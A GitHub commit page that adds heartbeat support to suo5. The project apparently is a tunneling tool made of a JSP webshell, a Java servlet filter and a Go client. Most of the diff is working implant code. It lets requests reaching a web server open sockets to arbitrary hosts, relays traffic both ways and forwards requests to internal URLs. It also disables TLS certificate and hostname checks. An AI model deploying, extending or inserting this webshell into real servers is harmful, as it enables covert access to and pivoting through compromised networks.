Skip to content

Commit

Permalink
Merge pull request #13 from zema1/feat/heartbeat
Browse files Browse the repository at this point in the history
support heartbeat
  • Loading branch information
zema1 authored Mar 14, 2023
2 parents 3938549 + c446aa8 commit 2470bc0
Show file tree
Hide file tree
Showing 8 changed files with 243 additions and 104 deletions.
73 changes: 50 additions & 23 deletions assets/Suo5Filter.java
Original file line number Diff line number Diff line change
Expand Up @@ -16,13 +16,17 @@
import java.util.HashMap;

public class Suo5Filter implements Runnable, HostnameVerifier, X509TrustManager, Filter {
static HashMap<String, Boolean> addrs = collectAddr();

InputStream gInStream;
OutputStream gOutStream;

private void setStream(InputStream in, OutputStream out) {
gInStream = in;
gOutStream = out;
public Suo5Filter() {
}

public Suo5Filter(InputStream in, OutputStream out) {
this.gInStream = in;
this.gOutStream = out;
}

public void init(FilterConfig filterConfig) throws ServletException {
Expand Down Expand Up @@ -65,6 +69,7 @@ public void doFilter(ServletRequest sReq, ServletResponse sResp, FilterChain cha
}
}


public void readInputStreamWithTimeout(InputStream is, byte[] b, int timeoutMillis) throws IOException, InterruptedException {
int bufferOffset = 0;
long maxTimeMillis = new Date().getTime() + timeoutMillis;
Expand Down Expand Up @@ -245,8 +250,7 @@ private void processDataBio(HttpServletRequest request, HttpServletResponse resp

Thread t = null;
try {
Suo5Filter p = new Suo5Filter();
p.setStream(scInStream, respOutStream);
Suo5Filter p = new Suo5Filter(scInStream, respOutStream);
t = new Thread(p);
t.start();
readReq(reqReader, scOutStream);
Expand Down Expand Up @@ -296,6 +300,8 @@ private void readReq(BufferedInputStream bufInputStream, OutputStream socketOutS
socketOutStream.write(data);
socketOutStream.flush();
}
} else if (action[0] == 0x03) {
continue;
} else {
return;
}
Expand All @@ -318,9 +324,10 @@ private void processDataUnary(HttpServletRequest request, HttpServletResponse re
return;
}
/*
ActionCreate byte = 0x00
ActionData byte = 0x01
ActionDelete byte = 0x02
ActionCreate byte = 0x00
ActionData byte = 0x01
ActionDelete byte = 0x02
ActionHeartbeat byte = 0x03
*/
byte[] redirectData = dataMap.get("r");
boolean needRedirect = redirectData != null && redirectData.length > 0;
Expand All @@ -332,7 +339,7 @@ private void processDataUnary(HttpServletRequest request, HttpServletResponse re
}
// load balance, send request with data to request url
// action 0x00 need to pipe, see below
if (needRedirect && (action[0] == 0x01 || action[0] == 0x02)) {
if (needRedirect && action[0] >= 0x01 && action[0] <= 0x03) {
HttpURLConnection conn = redirect(request, dataMap, redirectUrl);
conn.disconnect();
return;
Expand Down Expand Up @@ -361,6 +368,11 @@ private void processDataUnary(HttpServletRequest request, HttpServletResponse re
}
respOutStream.close();
return;
} else {
}

if (action[0] != 0x00) {
return;
}
// 0x00 create new tunnel
resp.setHeader("X-Accel-Buffering", "no");
Expand Down Expand Up @@ -419,20 +431,36 @@ public void run() {
}
}

boolean isLocalAddr(String url) throws Exception {
String ip = (new URL(url)).getHost();
Enumeration<NetworkInterface> nifs = NetworkInterface.getNetworkInterfaces();
while (nifs.hasMoreElements()) {
NetworkInterface nif = nifs.nextElement();
Enumeration<InetAddress> addresses = nif.getInetAddresses();
while (addresses.hasMoreElements()) {
InetAddress addr = addresses.nextElement();
if (addr instanceof Inet4Address)
if (addr.getHostAddress().equals(ip))
return true;
static HashMap<String, Boolean> collectAddr() {
HashMap<String, Boolean> addrs = new HashMap<String, Boolean>();
try {
Enumeration<NetworkInterface> nifs = NetworkInterface.getNetworkInterfaces();
while (nifs.hasMoreElements()) {
NetworkInterface nif = nifs.nextElement();
Enumeration<InetAddress> addresses = nif.getInetAddresses();
while (addresses.hasMoreElements()) {
InetAddress addr = addresses.nextElement();
String s = addr.getHostAddress();
if (s != null) {
// fe80:0:0:0:fb0d:5776:2d7c:da24%wlan4 strip %wlan4
int ifaceIndex = s.indexOf('%');
if (ifaceIndex != -1) {
s = s.substring(0, ifaceIndex);
}
addrs.put(s, true);
}
}
}
} catch (Exception e) {
// System.out.printf("read socket error, %s\n", e);
// e.printStackTrace();
}
return false;
return addrs;
}

boolean isLocalAddr(String url) throws Exception {
String ip = (new URL(url)).getHost();
return addrs.containsKey(ip);
}

HttpURLConnection redirect(HttpServletRequest request, HashMap<String, byte[]> dataMap, String rUrl) throws Exception {
Expand All @@ -441,6 +469,7 @@ HttpURLConnection redirect(HttpServletRequest request, HashMap<String, byte[]> d
HttpURLConnection conn = (HttpURLConnection) u.openConnection();
conn.setRequestMethod(method);
conn.setConnectTimeout(3000);
conn.setReadTimeout(0);
conn.setDoOutput(true);
conn.setDoInput(true);

Expand Down Expand Up @@ -479,7 +508,5 @@ public void checkServerTrusted(X509Certificate[] chain, String authType) throws

public X509Certificate[] getAcceptedIssuers() {
return new X509Certificate[0];

}

}
80 changes: 53 additions & 27 deletions assets/suo5.jsp
Original file line number Diff line number Diff line change
@@ -1,23 +1,25 @@
<%@ page trimDirectiveWhitespaces="true" %>
<%@ page import="java.util.HashMap" %>
<%@ page import="java.nio.ByteBuffer" %>
<%@ page import="java.io.*" %>
<%@ page import="java.util.Date" %>
<%@ page import="java.util.Arrays" %>
<%@ page import="java.util.Enumeration" %>
<%@ page import="java.net.*" %>
<%@ page import="java.security.cert.X509Certificate" %>
<%@ page import="java.security.cert.CertificateException" %>
<%@ page import="javax.net.ssl.*" %>
<%@ page import="java.util.*" %>
<%!
public class Suo5 implements Runnable, HostnameVerifier, X509TrustManager {
public static class Suo5 implements Runnable, HostnameVerifier, X509TrustManager {
static HashMap<String, Boolean> addrs = collectAddr();
InputStream gInStream;
OutputStream gOutStream;
private void setStream(InputStream in, OutputStream out) {
gInStream = in;
gOutStream = out;
public Suo5() {
}
public Suo5(InputStream in, OutputStream out) {
this.gInStream = in;
this.gOutStream = out;
}
public void process(ServletRequest sReq, ServletResponse sResp) {
Expand Down Expand Up @@ -230,8 +232,7 @@
Thread t = null;
try {
Suo5 p = new Suo5();
p.setStream(scInStream, respOutStream);
Suo5 p = new Suo5(scInStream, respOutStream);
t = new Thread(p);
t.start();
readReq(reqReader, scOutStream);
Expand Down Expand Up @@ -281,6 +282,8 @@
socketOutStream.write(data);
socketOutStream.flush();
}
} else if (action[0] == 0x03) {
continue;
} else {
return;
}
Expand All @@ -303,9 +306,10 @@
return;
}
/*
ActionCreate byte = 0x00
ActionData byte = 0x01
ActionDelete byte = 0x02
ActionCreate byte = 0x00
ActionData byte = 0x01
ActionDelete byte = 0x02
ActionHeartbeat byte = 0x03
*/
byte[] redirectData = dataMap.get("r");
boolean needRedirect = redirectData != null && redirectData.length > 0;
Expand All @@ -317,7 +321,7 @@
}
// load balance, send request with data to request url
// action 0x00 need to pipe, see below
if (needRedirect && (action[0] == 0x01 || action[0] == 0x02)) {
if (needRedirect && action[0] >= 0x01 && action[0] <= 0x03) {
HttpURLConnection conn = redirect(request, dataMap, redirectUrl);
conn.disconnect();
return;
Expand Down Expand Up @@ -346,6 +350,11 @@
}
respOutStream.close();
return;
} else {
}
if (action[0] != 0x00) {
return;
}
// 0x00 create new tunnel
resp.setHeader("X-Accel-Buffering", "no");
Expand Down Expand Up @@ -404,20 +413,36 @@
}
}
boolean isLocalAddr(String url) throws Exception {
String ip = (new URL(url)).getHost();
Enumeration<NetworkInterface> nifs = NetworkInterface.getNetworkInterfaces();
while (nifs.hasMoreElements()) {
NetworkInterface nif = nifs.nextElement();
Enumeration<InetAddress> addresses = nif.getInetAddresses();
while (addresses.hasMoreElements()) {
InetAddress addr = addresses.nextElement();
if (addr instanceof Inet4Address)
if (addr.getHostAddress().equals(ip))
return true;
static HashMap<String, Boolean> collectAddr() {
HashMap<String, Boolean> addrs = new HashMap<String, Boolean>();
try {
Enumeration<NetworkInterface> nifs = NetworkInterface.getNetworkInterfaces();
while (nifs.hasMoreElements()) {
NetworkInterface nif = nifs.nextElement();
Enumeration<InetAddress> addresses = nif.getInetAddresses();
while (addresses.hasMoreElements()) {
InetAddress addr = addresses.nextElement();
String s = addr.getHostAddress();
if (s != null) {
// fe80:0:0:0:fb0d:5776:2d7c:da24%wlan4 strip %wlan4
int ifaceIndex = s.indexOf('%');
if (ifaceIndex != -1) {
s = s.substring(0, ifaceIndex);
}
addrs.put(s, true);
}
}
}
} catch (Exception e) {
// System.out.printf("read socket error, %s\n", e);
// e.printStackTrace();
}
return false;
return addrs;
}
boolean isLocalAddr(String url) throws Exception {
String ip = (new URL(url)).getHost();
return addrs.containsKey(ip);
}
HttpURLConnection redirect(HttpServletRequest request, HashMap<String, byte[]> dataMap, String rUrl) throws Exception {
Expand All @@ -426,6 +451,7 @@
HttpURLConnection conn = (HttpURLConnection) u.openConnection();
conn.setRequestMethod(method);
conn.setConnectTimeout(3000);
conn.setReadTimeout(0);
conn.setDoOutput(true);
conn.setDoInput(true);
Expand Down Expand Up @@ -470,4 +496,4 @@
<%
Suo5 o = new Suo5();
o.process(request, response);
%>
%>
23 changes: 18 additions & 5 deletions ctrl/chunked.go
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,10 @@ import (
"sync"
)

type RawWriter interface {
WriteRaw(p []byte) (n int, err error)
}

type fullChunkedReadWriter struct {
id string
reqBody io.WriteCloser
Expand All @@ -24,14 +28,15 @@ type fullChunkedReadWriter struct {

// NewFullChunkedReadWriter 全双工读写流
func NewFullChunkedReadWriter(id string, reqBody io.WriteCloser, serverResp io.ReadCloser) io.ReadWriter {
return &fullChunkedReadWriter{
rw := &fullChunkedReadWriter{
id: id,
reqBody: reqBody,
serverResp: serverResp,
readBuf: bytes.Buffer{},
readTmp: make([]byte, 16*1024),
writeTmp: make([]byte, 8*1024),
}
return rw
}

func (s *fullChunkedReadWriter) Read(p []byte) (n int, err error) {
Expand Down Expand Up @@ -64,9 +69,13 @@ func (s *fullChunkedReadWriter) Read(p []byte) (n int, err error) {
}

func (s *fullChunkedReadWriter) Write(p []byte) (n int, err error) {
log.Debugf("write data, length: %d", len(p))
log.Debugf("write socket data, length: %d", len(p))
body := buildBody(newActionData(s.id, p, ""))
return s.reqBody.Write(body)
return s.WriteRaw(body)
}

func (s *fullChunkedReadWriter) WriteRaw(p []byte) (n int, err error) {
return s.reqBody.Write(p)
}

func (s *fullChunkedReadWriter) Close() error {
Expand Down Expand Up @@ -146,14 +155,18 @@ func (s *halfChunkedReadWriter) Read(p []byte) (n int, err error) {
func (s *halfChunkedReadWriter) Write(p []byte) (n int, err error) {
body := buildBody(newActionData(s.id, p, s.redirect))
log.Debugf("send request, length: %d", len(body))
req, err := http.NewRequestWithContext(s.ctx, s.method, s.target, bytes.NewReader(body))
return s.WriteRaw(body)
}

func (s *halfChunkedReadWriter) WriteRaw(p []byte) (n int, err error) {
req, err := http.NewRequestWithContext(s.ctx, s.method, s.target, bytes.NewReader(p))
if err != nil {
return 0, err
}
if s.chunked {
req.ContentLength = -1
} else {
req.ContentLength = int64(len(body))
req.ContentLength = int64(len(p))
}
req.Header = s.baseHeader.Clone()
resp, err := s.client.Do(req)
Expand Down
Loading

0 comments on commit 2470bc0

Please sign in to comment.